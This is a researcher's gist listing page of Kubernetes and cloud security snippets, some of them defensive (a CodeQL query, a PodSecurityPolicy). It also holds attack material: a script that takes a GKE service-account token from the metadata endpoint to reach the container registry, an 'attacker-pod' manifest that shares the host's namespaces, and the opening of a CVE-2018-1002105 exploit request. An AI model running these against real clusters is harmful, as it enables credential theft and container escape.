Abhisek Datta abhisek

abhisek / gke-pod-hacks.sh
Last active May 12, 2020
Lateral movement in GKE Pod using Cloud metadata endpoint
# Get a temporary access token from the Google Cloud instance metadata endpoint
export TOKEN=$(curl -sk -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token | \
  jq -r '.access_token')
# List all repos in the Google Cloud registry using the access token
curl -u "oauth2accesstoken:$TOKEN" https://eu.gcr.io/v2/_catalog
# Docker login
echo "$TOKEN" | docker login --username oauth2accesstoken --password-stdin eu.gcr.io
abhisek / go-int-down-casting.ql
Created May 2, 2020
CodeQL query to find integer casting issues
import go
import semmle.go.dataflow.DataFlow
import semmle.go.dataflow.TaintTracking
class IntegerSource extends Function {
  IntegerSource() {
    this.hasQualifiedName("strconv", "Atoi") or
    this.hasQualifiedName("strconv", "ParseInt")
  }
}
abhisek / ghidra.sh
Created Apr 20, 2020
Ghidra in docker
ghidra () {
  del_stopped ghidra
  xhost +local:root
  docker run --init -it --rm --name ghidra \
    --cpus 2 --memory 4g -e MAXMEM=4G \
    -v /etc/localtime:/etc/localtime:ro \
    -v /tmp/.X11-unix:/tmp/.X11-unix \
    -v "${HOME}/.gtkrc:/root/.gtkrc" \
    -e "DISPLAY=unix${DISPLAY}" \
    -v /home/user1/Work/ghidra/conf/.ghidra:/root/.ghidra \
    -v /home/user1/Work/ghidra:/root/storage \
    blacktop/ghidra
  xhost -local:root
}
ghidra
abhisek / psp.yml
Created Mar 17, 2020
PodSecurityPolicy to Prevent hostPath Mount
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: developers-psp
spec:
  privileged: false
  allowPrivilegeEscalation: false
  hostNetwork: false
  hostPID: false
  hostIPC: false
abhisek / pod-to-node.yml
Created Mar 17, 2020
Kubernetes Pod hostPath Volume Mount
apiVersion: v1
kind: Pod
metadata:
  labels:
    run: attacker-pod
  name: attacker-pod
spec:
  hostPID: true
  hostIPC: true
  hostNetwork: true
abhisek / sa-to-kubeconfig.sh
Created Mar 17, 2020
Generate kubeconfig for Service Account
#!/bin/bash
export TARGET_CONFIGSERVER=$(kubectl cluster-info | grep master | awk '{print $NF}' | sed 's/\x1B\[[0-9;]\+[A-Za-z]//g')
export TARGET_TOKENNAME=$(kubectl -n developers get sa developer-sa -o jsonpath='{.secrets[0].name}')
export TARGET_CONFIGTOKEN=$(kubectl -n developers get secret $TARGET_TOKENNAME -o "jsonpath={.data.token}" | base64 -d)
export TARGET_CONFIGCRT=$(kubectl -n developers get secret $TARGET_TOKENNAME -o "jsonpath={.data['ca\.crt']}")
cat <<EOF
apiVersion: v1
kind: Config
abhisek / k8s-sa-pod-crud.yml
Created Mar 17, 2020
Kubernetes Service Account with Pod CRUD Privilege to Single Namespace
apiVersion: v1
kind: Namespace
metadata:
  name: developers
---
apiVersion: v1
kind: ServiceAccount
metadata:
abhisek / pod-node-access.yml
Created Nov 20, 2019
Pod with Node Access
apiVersion: v1
kind: Pod
metadata:
  labels:
    run: ubuntu-1
  name: ubuntu-1
spec:
  hostPID: true
  hostIPC: true
  hostNetwork: true
abhisek / mongo-api-client.js
Created Jul 5, 2019
Mongo Cloud Atlas Events API to Elasticsearch
'use strict'
const MONGO_ATLAS_USERNAME = 'USER'
const MONGO_ATLAS_APIKEY = 'APIKEY'
const MONGO_ATLAS_STAGING_GROUP_ID = 'ID1'
const MONGO_ATLAS_PRODUCTION_GROUP_ID = 'ID2'
const MONGO_ATLAS_EVENTS_API = 'https://cloud.mongodb.com/api/atlas/v1.0/groups/{{GROUP-ID}}/events'
abhisek / gist:3ef7f1e208d46771cb79b6440028b787
Created Dec 7, 2018
Kubernetes Exploit CVE-2018-1002105
GET /api/v1/namespaces/mynamespace/pods/cool-79b76569d9-wxsvs/exec HTTP/1.1
Authorization: Bearer $TOKEN
Host: 192.168.12.10:6443
Connection: upgrade
Upgrade: websocket